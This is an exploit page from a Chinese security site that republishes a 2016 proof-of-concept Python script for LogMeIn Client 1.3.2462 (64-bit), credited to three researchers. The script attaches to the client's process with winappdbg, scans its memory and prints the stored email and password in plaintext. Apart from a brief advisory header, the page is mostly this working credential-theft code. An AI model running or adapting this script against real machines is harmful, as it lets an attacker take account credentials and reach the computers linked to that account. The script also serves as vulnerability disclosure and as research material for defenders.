首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure 来源：http://www.black-rose.ml 作者：Wizman 发布时间：2016-09-09   ##### # LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure # Tested on Windows Windows Server 2012 R2 64bit, English # Vendor Homepage @ https://secure.logmein.com/home/en # Date 06/09/2016 # Bug Discovery by: # # Alexander Korznikov (https://www.linkedin.com/in/nopernik) # http://korznikov.com/ # # Viktor Minin (https://www.linkedin.com/in/MininViktor) # https://1-33-7.com/ # # Yakir Wizman (https://www.linkedin.com/in/yakirwizman) # http://www.black-rose.ml # ##### # LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. # A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers. ##### # Proof-Of-Concept Code:   import time import urllib from winappdbg import Debug, Process   username    = '' password    = '' found       = 0 filename    = "LMIIgnition.exe" process_pid = 0 memory_dump = []   debug = Debug() try:     print "[~] Searching for pid by process name '%s'.." % (filename)     time.sleep(1)     debug.system.scan_processes()     for (process, process_name) in debug.system.find_processes_by_filename(filename):         process_pid = process.get_pid()     if process_pid is not 0:         print "[+] Found process with pid #%d" % (process_pid)         time.sleep(1)         print "[~] Trying to read memory for pid #%d" % (process_pid)                  process = Process(process_pid)         for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):             memory_dump.append(process.read(address,150))         for i in range(len(memory_dump[0])):             email_addr  = memory_dump[i].split('email=')[1]             tmp_passwd  = memory_dump[i].split('password=')[1]             username    = email_addr.split('&hiddenEmail=')[0]             password    = tmp_passwd.split('&rememberMe=')[0]             if username != '' and password !='':                 found = 1                 print "[+] Credentials found!\r\n----------------------------------------"                 print "[+] Username: %s" % urllib.unquote_plus(username)                 print "[+] Password: %s" % password                 break         if found == 0:             print "[-] Credentials not found! Make sure the client is connected."     else:         print "[-] No process found with name '%s'." % (filename)          debug.loop() finally:     debug.stop()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Dropbox Desktop Client 9.4.49 ·Apple iCloud Desktop Client 5. ·Apache/mod_ssl OpenSSL < 0.9.6 ·Zabbix 2.0 - 3.0.3 - SQL Injec ·Adobe ColdFusion < 11 Update 1 ·Vodafone Mobile Wifi - Reset A ·SugarCRM 6.5.23 - REST PHP Obj ·LamaHub 0.0.6.2 - Buffer Overf ·TeamViewer 11.0.65452 (64 bit) ·Multiple Applications - Local ·MySQL / MariaDB / PerconaDB 5. ·WIN-911 7.17.00 - Multiple Vul   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved